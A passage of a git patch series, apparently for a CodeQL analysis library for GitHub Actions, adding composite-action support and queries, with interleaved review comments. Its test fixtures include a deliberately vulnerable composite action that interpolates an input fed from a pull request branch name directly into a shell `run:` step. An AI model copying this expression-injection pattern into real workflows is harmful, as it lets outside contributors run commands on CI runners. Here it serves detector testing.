@@ -53,25 +49,21 @@ query predicate cfgNodes(Cfg::Node n) { } query predicate dfNodes(DataFlow::Node e) { - e.getLocation().getFile().getBaseName() = "simple1.yml" + e.getLocation().getFile().getBaseName() = "argus_case_study.yml" } query predicate exprNodes(DataFlow::ExprNode e) { any() } query predicate argumentNodes(DataFlow::ArgumentNode e) { any() } -query predicate localFlow(StepUsesExpr s, StepOutputAccessExpr o) { s.getId() = o.getStepId() } - query predicate usesIds(StepUsesExpr s, string a) { s.getId() = a } -query predicate varIds(StepOutputAccessExpr s, string a) { s.getStepId() = a } - query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l } query predicate scopes(Cfg::CfgScope c) { any() } -query predicate sources(string action, string version, string output, string kind) { - sourceModel(action, version, output, kind) +query predicate sources(string action, string version, string output, string trigger, string kind) { + sourceModel(action, version, output, trigger, kind) } query predicate summaries(string action, string version, string input, string output, string kind) { From e9707af38df5af35813eb01dd4fa70d7bbcb1eec Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 12 Feb 2024 22:55:58 +0100 Subject: [PATCH 022/707] feat: support for composite action's analysis --- ql/lib/codeql/actions/Ast.qll | 88 ++++++++++--------- .../actions/controlflow/internal/Cfg.qll | 44 ++++++++-- .../codeql/actions/dataflow/FlowSources.qll | 11 +++ ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 9 +- .../dataflow/internal/DataFlowPublic.qll | 7 +- ql/lib/test/test.ql | 2 +- .../CWE-020/CompositeActionSummaries.ql | 36 ++++++++ .../CWE-020/CompositeActionsSources.ql | 38 ++++++++ .../Security/CWE-094/ExpressionInjection.ql | 2 +- .../.github/workflows/calling_composite.yml | 14 +++ .../test/.github/workflows/changed-files.yml | 2 - ql/src/test/composite-actions/action.yml | 50 +++++++++++ 13 files changed, 243 insertions(+), 62 deletions(-) create mode 100644 ql/src/Security/CWE-020/CompositeActionSummaries.ql create mode 100644 ql/src/Security/CWE-020/CompositeActionsSources.ql create mode 100644 ql/src/test/.github/workflows/calling_composite.yml create mode 100644 ql/src/test/composite-actions/action.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 61f2d8e91d76..0685b2fc14df 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -27,6 +27,25 @@ class Statement extends AstNode { } */ class Expression extends Statement { } +/** + * A composite action + */ +class CompositeActionStmt extends Statement instanceof Actions::CompositeAction { + RunsStmt getRunsStmt() { result = super.getRuns() } + + InputsStmt getInputsStmt() { result = this.(YamlMapping).lookup("inputs") } + + OutputsStmt getOutputsStmt() { result = this.(YamlMapping).lookup("outputs") } + + string getName() { result = this.getLocation().getFile().getRelativePath() } +} + +class RunsStmt extends Statement instanceof Actions::Runs { + StepStmt getAStepStmt() { result = super.getSteps().getElementNode(_) } + + StepStmt getStepStmt(int i) { result = super.getSteps().getElementNode(i) } +} + /** * A Github Actions Workflow */ 
@@ -43,67 +62,45 @@ class ReusableWorkflowStmt extends WorkflowStmt { this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } - ReusableWorkflowInputsStmt getInputsStmt() { - result = workflow_call.(YamlMapping).lookup("inputs") - } + InputsStmt getInputsStmt() { result = workflow_call.(YamlMapping).lookup("inputs") } - ReusableWorkflowOutputsStmt getOutputsStmt() { - result = workflow_call.(YamlMapping).lookup("outputs") - } + OutputsStmt getOutputsStmt() { result = workflow_call.(YamlMapping).lookup("outputs") } string getName() { result = this.getLocation().getFile().getRelativePath() } } -class ReusableWorkflowInputsStmt extends Statement instanceof YamlMapping { - ReusableWorkflowInputsStmt() { - exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("inputs") = this) - } +class InputsStmt extends Statement instanceof YamlMapping { + YamlMapping parent; + + InputsStmt() { parent.lookup("inputs") = this } /** - * Gets a specific parameter expression (YamlMapping) by name. - * eg: - * on: - * workflow_call: - * inputs: - * config-path: - * required: true - * type: string - * secrets: - * token: - * required: true + * Gets a specific input expression (YamlMapping) by name. */ - ReusableWorkflowInputExpr getInputExpr(string name) { + InputExpr getInputExpr(string name) { result.(YamlString).getValue() = name and this.(YamlMapping).maps(result, _) } } -class ReusableWorkflowInputExpr extends Expression instanceof YamlString { } +class OutputsStmt extends Statement instanceof YamlMapping { + YamlMapping parent; -class ReusableWorkflowOutputsStmt extends Statement instanceof YamlMapping { - ReusableWorkflowOutputsStmt() { - exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("outputs") = this) - } + OutputsStmt() { parent.lookup("outputs") = this } /** - * Gets a specific parameter expression (YamlMapping) by name. 
- * eg: - * on: - * workflow_call: - * outputs: - * firstword: - * description: "The first output string" - * value: ${{ jobs.example_job.outputs.output1 }} - * secondword: - * description: "The second output string" - * value: ${{ jobs.example_job.outputs.output2 }} + * Gets a specific output expression (YamlMapping) by name. */ - ReusableWorkflowOutputExpr getOutputExpr(string name) { + OutputExpr getOutputExpr(string name) { this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result } } -class ReusableWorkflowOutputExpr extends Expression instanceof YamlString { } +// TODO: Needs a characteristic predicate otherwise anything is an output expression +class InputExpr extends Expression instanceof YamlString { } + +// TODO: Needs a characteristic predicate otherwise anything is an output expression +class OutputExpr extends Expression instanceof YamlString { } /** * A Job is a collection of steps that run in an execution environment. @@ -369,7 +366,7 @@ class StepOutputAccessExpr extends ExprAccessExpr { } override Expression getRefExpr() { - this.getJobStmt() = result.(StepStmt).getJobStmt() and + this.getLocation().getFile() = result.getLocation().getFile() and result.(StepStmt).getId() = stepId } } @@ -413,10 +410,10 @@ class JobOutputAccessExpr extends ExprAccessExpr { * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability * e.g. `${{ inputs.foo }}` */ -class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { +class InputAccessExpr extends ExprAccessExpr { string paramName; - ReusableWorkflowInputAccessExpr() { + InputAccessExpr() { paramName = this.getExpression().regexpCapture("inputs\\.([A-Za-z0-9_-]+)", 1) } 
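Review bot: `InputsStmt` and `OutputsStmt` now accept any YAML mapping reached through an `inputs` or `outputs` key (`parent.lookup("inputs") = this`), not only the `on.workflow_call` and composite-action ones, so a `workflow_dispatch: inputs:` block or any `with:` mapping that happens to contain an `inputs` key becomes a statement with its own CFG tree. The `TODO` comments acknowledge this for `InputExpr`/`OutputExpr`, but the containers have the same problem; restricting `parent` to `Actions::CompositeAction` or the `workflow_call` node would keep the old precision. The hunk starts in the middle of `ReusableWorkflowStmt`.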
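Review bot: `StepOutputAccessExpr.getRefExpr` now matches any step with the same id anywhere in the same file instead of within the same job, and step ids only need to be unique per job, so `${{ steps.build.outputs.x }}` in one job can pick up a `build` step from another job. Presumably the change is to cover composite actions, which have no `JobStmt`; keep the job constraint when there is one, `this.getJobStmt() = result.(StepStmt).getJobStmt() or (not exists(this.getJobStmt()) and this.getLocation().getFile() = result.getLocation().getFile())`, together with the existing id check.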
@@ -425,6 +422,11 @@ class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { w.getLocation().getFile() = this.getLocation().getFile() and w.getInputsStmt().getInputExpr(paramName) = result ) + or + exists(CompositeActionStmt a | + a.getLocation().getFile() = this.getLocation().getFile() and + a.getInputsStmt().getInputExpr(paramName) = result + ) } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index 0dd34ff926f8..bb0c25dbdf68 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -88,6 +88,8 @@ module CfgScope { abstract class CfgScope extends AstNode { } class WorkflowScope extends CfgScope instanceof WorkflowStmt { } + + class CompositeActionScope extends CfgScope instanceof CompositeActionStmt { } } private module Implementation implements CfgShared::InputSig { @@ -120,9 +122,15 @@ private module Implementation implements CfgShared::InputSig { int maxSplits() { result = 0 } - predicate scopeFirst(CfgScope scope, AstNode e) { first(scope.(WorkflowStmt), e) } + predicate scopeFirst(CfgScope scope, AstNode e) { + first(scope.(WorkflowStmt), e) or + first(scope.(CompositeActionStmt), e) + } - predicate scopeLast(CfgScope scope, AstNode e, Completion c) { last(scope.(WorkflowStmt), e, c) } + predicate scopeLast(CfgScope scope, AstNode e, Completion c) { + last(scope.(WorkflowStmt), e, c) or + last(scope.(CompositeActionStmt), e, c) + } predicate successorTypeIsSimple(SuccessorType t) { t instanceof NormalSuccessor } 
@@ -139,6 +147,28 @@ private import CfgImpl private import Completion private import CfgScope +private class CompositeActionTree extends StandardPreOrderTree instanceof CompositeActionStmt { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + ( + child = this.(CompositeActionStmt).getInputsStmt() or + child = this.(CompositeActionStmt).getOutputsStmt() or + child = this.(CompositeActionStmt).getRunsStmt() + ) and + l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class RunsTree extends StandardPreOrderTree instanceof RunsStmt { + override ControlFlowTree getChildNode(int i) { result = super.getStepStmt(i) } +} + private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt { override ControlFlowTree getChildNode(int i) { if this instanceof ReusableWorkflowStmt @@ -169,8 +199,7 @@ private class WorkflowTree extends StandardPreOrderTree instanceof WorkflowStmt } } -private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof ReusableWorkflowInputsStmt -{ +private class InputsTree extends StandardPreOrderTree instanceof InputsStmt { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | @@ -183,10 +212,9 @@ private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof } } -private class InputExprTree extends LeafTree instanceof ReusableWorkflowInputExpr { } +private class InputExprTree extends LeafTree instanceof InputExpr { } -private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceof ReusableWorkflowOutputsStmt -{ +private class OutputsTree extends StandardPreOrderTree instanceof OutputsStmt { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | 
@@ -199,7 +227,7 @@ private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceo } } -private class OutputExprTree extends LeafTree instanceof ReusableWorkflowOutputExpr { } +private class OutputExprTree extends LeafTree instanceof OutputExpr { } private class JobTree extends StandardPreOrderTree instanceof JobStmt { override ControlFlowTree getChildNode(int i) { diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 120444863e55..fae6c74b0b3c 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -161,3 +161,14 @@ private class ExternallyDefinedSource extends RemoteFlowSource { override string getSourceType() { result = soutceType } } + +/** + * Composite action input sources + */ +private class CompositeActionInputSource extends RemoteFlowSource { + CompositeActionStmt c; + + CompositeActionInputSource() { c.getInputsStmt().getInputExpr(_) = this.asExpr() } + + override string getSourceType() { result = "Composite action input" } +} diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index cafd60832760..750a4011320e 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -83,7 +83,7 @@ predicate runEnvToScriptstep(DataFlow::Node pred, DataFlow::Node succ) { line = script.splitAt("\n") and ( line.regexpMatch(".*::set-output\\s+name.*") or - line.regexpMatch(".*>>\\s*$GITHUB_ENV.*") + line.regexpMatch(".*>>\\s*\\$GITHUB_OUTPUT.*") ) and script.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 ) and diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index ee59e25ab20a..79bd48b395a7 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll 
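Review bot: The new `>>\s*\$GITHUB_OUTPUT` pattern only recognises the bare unquoted form; the common `>> "$GITHUB_OUTPUT"` and `>> "${GITHUB_OUTPUT}"` spellings fall through, so a step that writes its output that way gets no run-to-output step and downstream taint is silently dropped. Something like `line.regexpMatch(".*>>\\s*\"?\\$\\{?GITHUB_OUTPUT\\}?\"?.*")` covers those spellings without widening the match to unrelated redirects. The removed `$GITHUB_ENV` alternative had an unescaped `$` (end-of-input anchor followed by literal text) and could never match, so dropping it changes nothing observable, but if `GITHUB_ENV` writes are modelled elsewhere a sentence in the predicate doc saying so would stop the next reader re-adding it here. runEnvToScriptstep starts outside the hunk.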
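Review bot: `CompositeActionInputSource` makes every composite-action input a `RemoteFlowSource`, which means any query keyed on that class (e.g. the expression-injection query) will now flag `${{ inputs.x }}` interpolated into a `run:` of every composite action regardless of who calls it. That is a defensible stance (an action cannot know whether its callers pass fork-controlled data) but it is a policy decision and deserves to be stated in the class doc rather than the bare "Composite action input sources", e.g. `/** Composite action inputs are treated as untrusted because the action cannot know what its callers pass; queries that want only caller-proven taint should exclude getSourceType() = "Composite action input". */`.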
@@ -82,7 +82,10 @@ class DataFlowCallable instanceof Cfg::CfgScope { string getName() { if this instanceof ReusableWorkflowStmt then result = this.(ReusableWorkflowStmt).getName() - else none() + else + if this instanceof CompositeActionStmt + then result = this.(CompositeActionStmt).getName() + else none() } } @@ -190,11 +193,11 @@ predicate jobsCtxLocalStep(Node nodeFrom, Node nodeTo) { } /** - * Holds if there is a local flow step between a ${{}} expression accesing a reusable workflow input variable and the input itself + * Holds if there is a local flow step between a ${{}} expression accesing an input variable and the input itself * e.g. ${{ inputs.foo }} */ predicate inputsCtxLocalStep(Node nodeFrom, Node nodeTo) { - exists(Expression astFrom, ReusableWorkflowInputAccessExpr astTo | + exists(Expression astFrom, InputAccessExpr astTo | astFrom = nodeFrom.asExpr() and astTo = nodeTo.asExpr() and astTo.getRefExpr() = astFrom diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index a14b06938746..d83608dc2b8d 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -48,7 +48,7 @@ class ExprNode extends Node, TExprNode { * Reusable workflow input nodes */ class ParameterNode extends ExprNode { - private ReusableWorkflowInputExpr parameter; + private InputExpr parameter; ParameterNode() { this.asExpr() = parameter and @@ -63,7 +63,7 @@ class ParameterNode extends ExprNode { override Location getLocation() { result = parameter.getLocation() } - ReusableWorkflowInputExpr getInputExpr() { result = parameter } + InputExpr getInputExpr() { result = parameter } } /** 
@@ -87,7 +87,8 @@ class ReturnNode extends ExprNode { ReturnNode() { this.getCfgNode() = node and - node.getAstNode() = any(ReusableWorkflowStmt w).getOutputsStmt().getOutputExpr(_) + (node.getAstNode() = any(ReusableWorkflowStmt w).getOutputsStmt().getOutputExpr(_) or + node.getAstNode() = any(CompositeActionStmt a).getOutputsStmt().getOutputExpr(_)) } ReturnKind getKind() { result = TNormalReturn() } diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index 36c268ecc99d..4b2be43bbdaf 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql @@ -45,7 +45,7 @@ query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode query predicate cfgNodes(Cfg::Node n) { //any() - n.getAstNode() instanceof ReusableWorkflowOutputsStmt + n.getAstNode() instanceof OutputsStmt } query predicate dfNodes(DataFlow::Node e) { diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionSummaries.ql new file mode 100644 index 000000000000..46a7797e2b27 --- /dev/null +++ b/ql/src/Security/CWE-020/CompositeActionSummaries.ql 
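@@ -0,0 +1,36 @@
+/**
+ * @name Composite Action Summaries
+ * @description Actions that pass user-controlled data to their output variables.
+ * @kind path-problem
+ * @problem.severity warning
+ * @security-severity 9.3
+ * @precision high
+ * @id actions/composite-action-summaries
+ * @tags actions
+ * external/cwe/cwe-020
+ */
+
+import actions
+import codeql.actions.TaintTracking
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.dataflow.ExternalFlow
+
+private class OutputVariableSink extends DataFlow::Node {
+ OutputVariableSink() { exists(OutputsStmt s | s.getOutputExpr(_) = this.asExpr()) }
+}
+
+private module MyConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) {
+ exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr())
+ }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof OutputVariableSink }
+}
+
+module MyFlow = TaintTracking::Global;
+
+import MyFlow::PathGraph
+
+from MyFlow::PathNode source, MyFlow::PathNode sink
+where MyFlow::flowPath(source, sink)
+select sink.getNode(), source, sink, "Summary"
diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql new file mode 100644
index 000000000000..09556ac1b78b
--- /dev/null
+++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql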
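Review bot: The metadata describes a security alert but the query computes a flow summary: the source is every composite-action input (not an untrusted value) and the message is the literal string "Summary", yet `@security-severity 9.3`, `@precision high` and `external/cwe/cwe-020` will surface it as a critical finding for any action that merely forwards an input to an output. If this is meant to feed summary models rather than alert users, drop the security-severity and CWE tags and say so, e.g. `@description Flow summaries from composite action inputs to their outputs, for model generation; not a vulnerability by itself.`; if it is meant as an alert, the message should at least name the input and output involved instead of "Summary". The `@description` text is also identical to the one in CompositeActionsSources.ql, which hides which of the two a finding came from.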
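@@ -0,0 +1,38 @@
+/**
+ * @name Composite Action Sources
+ * @description Actions that pass user-controlled data to their output variables.
+ * @kind path-problem
+ * @problem.severity warning
+ * @security-severity 9.3
+ * @precision high
+ * @id actions/composite-action-sources
+ * @tags actions
+ * external/cwe/cwe-020
+ */
+
+import actions
+import codeql.actions.TaintTracking
+import codeql.actions.dataflow.FlowSources
+import codeql.actions.dataflow.ExternalFlow
+
+private class OutputVariableSink extends DataFlow::Node {
+ OutputVariableSink() { exists(OutputsStmt s | s.getOutputExpr(_) = this.asExpr()) }
+}
+
+private module MyConfig implements DataFlow::ConfigSig {
+ predicate isSource(DataFlow::Node source) {
+ source instanceof RemoteFlowSource and
+ exists(CompositeActionStmt c | c.getAChildNode*() = source.asExpr()) and
+ not exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr())
+ }
+
+ predicate isSink(DataFlow::Node sink) { sink instanceof OutputVariableSink }
+}
+
+module MyFlow = TaintTracking::Global;
+
+import MyFlow::PathGraph
+
+from MyFlow::PathNode source, MyFlow::PathNode sink
+where MyFlow::flowPath(source, sink)
+select sink.getNode(), source, sink, "Source"
diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql
index 7953c3b037c7..6860f091d5e6 100644
--- a/ql/src/Security/CWE-094/ExpressionInjection.ql
+++ b/ql/src/Security/CWE-094/ExpressionInjection.ql
@@ -6,7 +6,7 @@
 * @problem.severity warning
 * @security-severity 9.3
 * @precision high
- * @id actions/command-injection
+ * @id actions/expression-injection
 * @tags actions
 * security
 * external/cwe/cwe-094
diff --git a/ql/src/test/.github/workflows/calling_composite.yml b/ql/src/test/.github/workflows/calling_composite.yml new file mode 100644
index 000000000000..79c2d072ef56
--- /dev/null
+++ b/ql/src/test/.github/workflows/calling_composite.yml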
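@@ -0,0 +1,14 @@
+on: [push]
+
+jobs:
+ hello_world_job:
+ runs-on: ubuntu-latest
+ name: A job to say hello
+ steps:
+ - uses: actions/checkout@v4
+ - id: foo
+ uses: some-org/test-action@v1
+ with:
+ who-to-greet: ${{ github.event.pull_request.head.ref }}
+ - run: echo ${{ steps.foo.outputs.reflected}}
+ - run: echo ${{ steps.foo.outputs.tainted}}
diff --git a/ql/src/test/.github/workflows/changed-files.yml b/ql/src/test/.github/workflows/changed-files.yml
index 0a47960517f5..12bade510ba4 100644
--- a/ql/src/test/.github/workflows/changed-files.yml
+++ b/ql/src/test/.github/workflows/changed-files.yml
@@ -13,8 +13,6 @@ jobs:
 - uses: actions/checkout@v4
 with:
 fetch-depth: 0
-
- # Example 1
 - name: Get changed files
 id: changed-files
 uses: tj-actions/changed-files@v40
diff --git a/ql/src/test/composite-actions/action.yml b/ql/src/test/composite-actions/action.yml new file mode 100644
index 000000000000..c43d5fd66946
--- /dev/null
+++ b/ql/src/test/composite-actions/action.yml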
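@@ -0,0 +1,50 @@
+name: 'Hello World'
+description: 'Greet someone'
+inputs:
+ who-to-greet: # id of input
+ description: 'Who to greet'
+ required: true
+ default: 'World'
+outputs:
+ reflected:
+ description: "Reflected input"
+ value: ${{ steps.reflector.outputs.reflected }}
+ tainted:
+ description: "Reflected input"
+ value: ${{ steps.source.outputs.tainted}}
+
+runs:
+ using: "composite"
+ steps:
+ - name: Secure Set Greeting
+ run: echo "Hello $INPUT_WHO_TO_GREET."
+ shell: bash
+ env:
+ INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }}
+ - name: Remove foo
+ id: replace
+ uses: mad9000/actions-find-and-replace-string@3
+ with:
+ source: ${{ inputs.who-to-greet }}
+ find: 'foo'
+ replace: ''
+ - id: sink
+ run: echo ${{ steps.replace.outputs.value }}
+ shell: bash
+ - name: Vulnerable Set Greeting
+ run: echo "Hello ${{ inputs.who-to-greet }}."
+ shell: bash
+ - id: reflector
+ run: echo "reflected=$(echo $INPUT_WHO_TO_GREET)" >> $GITHUB_OUTPUT
+ shell: bash
+ env:
+ INPUT_WHO_TO_GREET: ${{ inputs.who-to-greet }}
+ - id: changed-files
+ uses: tj-actions/changed-files@v40
+ - id: source
+ run: echo "tainted=$(echo $TAINTED)" >> $GITHUB_OUTPUT
+ shell: bash
+ env:
+ TAINTED: ${{ steps.changed-files.outputs.all_changed_files }}
+
+
From cc3f2eed68329d37539675aa3a15c3798495feb3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 13 Feb 2024 11:24:16 +0100 Subject: [PATCH 023/707] add characteristic predicates to InputExpr and OutputExpr --- ql/lib/codeql/actions/Ast.qll | 10 ++++++---- ql/lib/codeql/actions/controlflow/internal/Cfg.qll | 6 +----- 2 files changed, 7 insertions(+), 9 deletions(-)
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll
index 0685b2fc14df..c7573dfb8399 100644
--- a/ql/lib/codeql/actions/Ast.qll
+++ b/ql/lib/codeql/actions/Ast.qll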
@@ -96,11 +96,13 @@ class OutputsStmt extends Statement instanceof YamlMapping { } } -// TODO: Needs a characteristic predicate otherwise anything is an output expression -class InputExpr extends Expression instanceof YamlString { } +class InputExpr extends Expression instanceof YamlString { + InputExpr() { exists(InputsStmt inputs | inputs.(YamlMapping).maps(this, _)) } +} -// TODO: Needs a characteristic predicate otherwise anything is an output expression -class OutputExpr extends Expression instanceof YamlString { } +class OutputExpr extends Expression instanceof YamlString { + OutputExpr() { exists(OutputsStmt outputs | outputs.(YamlMapping).maps(_, this)) } +} /** * A Job is a collection of steps that run in an execution environment. diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index bb0c25dbdf68..8d044c827a28 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -35,11 +35,7 @@ module Completion { override string toString() { result = "BooleanCompletion(" + value + ")" } - override predicate isValidForSpecific(AstNode e) { - none() - // TODO: add support for conditional expressions? - //e = any(ConditionalExpression c).getCondition() - } + override predicate isValidForSpecific(AstNode e) { none() } override BooleanSuccessor getAMatchingSuccessorType() { result.getValue() = value } From 271c512f4d05ba0778c81b8c9e8b553560631a72 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 13 Feb 2024 11:40:22 +0100 Subject: [PATCH 024/707] better identification of Composite Actions input and output nodes --- ql/lib/codeql/actions/Ast.qll | 10 ++++++-- .../dataflow/internal/DataFlowPublic.qll | 25 +++++++++---------- .../CWE-020/CompositeActionSummaries.ql | 10 ++++---- .../CWE-020/CompositeActionsSources.ql | 13 +++++----- 4 files changed, 31 insertions(+), 27 deletions(-) 
diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index c7573dfb8399..6307897685f8 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll @@ -92,7 +92,8 @@ class OutputsStmt extends Statement instanceof YamlMapping { * Gets a specific output expression (YamlMapping) by name. */ OutputExpr getOutputExpr(string name) { - this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result + this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result or + this.(YamlMapping).lookup(name) = result } } @@ -101,7 +102,12 @@ class InputExpr extends Expression instanceof YamlString { } class OutputExpr extends Expression instanceof YamlString { - OutputExpr() { exists(OutputsStmt outputs | outputs.(YamlMapping).maps(_, this)) } + OutputExpr() { + exists(OutputsStmt outputs | + outputs.(YamlMapping).lookup(_).(YamlMapping).lookup("value") = this or + outputs.(YamlMapping).lookup(_) = this + ) + } } /** diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index d83608dc2b8d..0204015ac22a 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll 
@@ -48,22 +48,22 @@ class ExprNode extends Node, TExprNode { * Reusable workflow input nodes */ class ParameterNode extends ExprNode { - private InputExpr parameter; + private InputExpr input; ParameterNode() { - this.asExpr() = parameter and - parameter = any(ReusableWorkflowStmt w).getInputsStmt().getInputExpr(_) + this.asExpr() = input and + input = any(InputsStmt s).getInputExpr(_) } predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { - parameter = c.(ReusableWorkflowStmt).getInputsStmt().getInputExpr(pos) + input = c.(ReusableWorkflowStmt).getInputsStmt().getInputExpr(pos) } - override string toString() { result = parameter.toString() } + override string toString() { result = "input " + input.toString() } - override Location getLocation() { result = parameter.getLocation() } + override Location getLocation() { result = input.getLocation() } - InputExpr getInputExpr() { result = parameter } + InputExpr getInputExpr() { result = input } } /** @@ -83,19 +83,18 @@ class ArgumentNode extends ExprNode { * Reusable workflow output nodes */ class ReturnNode extends ExprNode { - private Cfg::Node node; + private OutputExpr output; ReturnNode() { - this.getCfgNode() = node and - (node.getAstNode() = any(ReusableWorkflowStmt w).getOutputsStmt().getOutputExpr(_) or - node.getAstNode() = any(CompositeActionStmt a).getOutputsStmt().getOutputExpr(_)) + this.asExpr() = output and + output = any(OutputsStmt s).getOutputExpr(_) } ReturnKind getKind() { result = TNormalReturn() } - override string toString() { result = "return " + node.toString() } + override string toString() { result = "output " + output.toString() } - override Location getLocation() { result = node.getLocation() } + override Location getLocation() { result = output.getLocation() } } /** Gets the node corresponding to `e`. */ diff --git a/ql/src/Security/CWE-020/CompositeActionSummaries.ql b/ql/src/Security/CWE-020/CompositeActionSummaries.ql index 46a7797e2b27..00a70eeed2fb 100644 
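Review bot: `ParameterNode` now admits composite-action inputs (`input = any(InputsStmt s).getInputExpr(_)`) but `isParameterOf` still only resolves `c.(ReusableWorkflowStmt)`, so a composite input is a parameter of no callable and a `with:` argument passed to a composite action cannot be linked to it, even though `DataFlowCallable.getName()` was extended to `CompositeActionStmt` earlier in this series. Adding `or input = c.(CompositeActionStmt).getInputsStmt().getInputExpr(pos)` to `isParameterOf` closes the gap, given that `ParameterPosition` is the input name string as the existing reusable-workflow branch shows. The `ReturnNode` rewrite in the second hunk has the same shape and is consistent with that.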
--- a/ql/src/Security/CWE-020/CompositeActionSummaries.ql +++ b/ql/src/Security/CWE-020/CompositeActionSummaries.ql @@ -15,16 +15,16 @@ import codeql.actions.TaintTracking import codeql.actions.dataflow.FlowSources import codeql.actions.dataflow.ExternalFlow -private class OutputVariableSink extends DataFlow::Node { - OutputVariableSink() { exists(OutputsStmt s | s.getOutputExpr(_) = this.asExpr()) } -} - private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { + source instanceof DataFlow::ParameterNode and exists(CompositeActionStmt c | c.getInputsStmt().getInputExpr(_) = source.asExpr()) } - predicate isSink(DataFlow::Node sink) { sink instanceof OutputVariableSink } + predicate isSink(DataFlow::Node sink) { + sink instanceof DataFlow::ReturnNode and + exists(CompositeActionStmt c | c.getOutputsStmt().getOutputExpr(_) = sink.asExpr()) + } } module MyFlow = TaintTracking::Global; diff --git a/ql/src/Security/CWE-020/CompositeActionsSources.ql b/ql/src/Security/CWE-020/CompositeActionsSources.ql index 09556ac1b78b..f67811b3f5fa 100644 --- a/ql/src/Security/CWE-020/CompositeActionsSources.ql +++ b/ql/src/Security/CWE-020/CompositeActionsSources.ql 
